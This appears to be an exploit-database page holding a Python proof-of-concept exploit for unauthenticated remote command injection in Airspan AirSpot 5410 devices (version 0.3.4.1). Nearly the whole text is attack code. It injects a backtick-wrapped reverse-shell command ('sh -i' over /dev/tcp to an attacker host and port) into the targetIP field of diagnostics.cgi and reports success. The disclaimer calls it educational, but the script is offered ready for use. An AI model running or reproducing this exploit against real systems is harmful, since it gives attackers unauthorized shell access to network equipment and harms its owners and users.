Exploits / Vulnerability Discovered : 2022-09-20 |
Type : remote |
Platform : linux
This exploit / vulnerability Airspan airspot 5410 version 0.3.4.1 remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!
def pingWebInterface(RHOST, RPORT):
url = 'https://{}:{}'.format(RHOST, RPORT)
try:
response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
if response.status_code != 200:
print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()
print('[INFO] Airspan device web interface seems reachable!')
except:
print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()
def execReverseShell(RHOST, RPORT, LHOST, LPORT):
payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
try:
print('[INFO] Executing reverse shell...')
response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
return
except Exception as e:
print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
main()
Airspan airspot 5410 version 0.3.4.1 remote code execution (rce)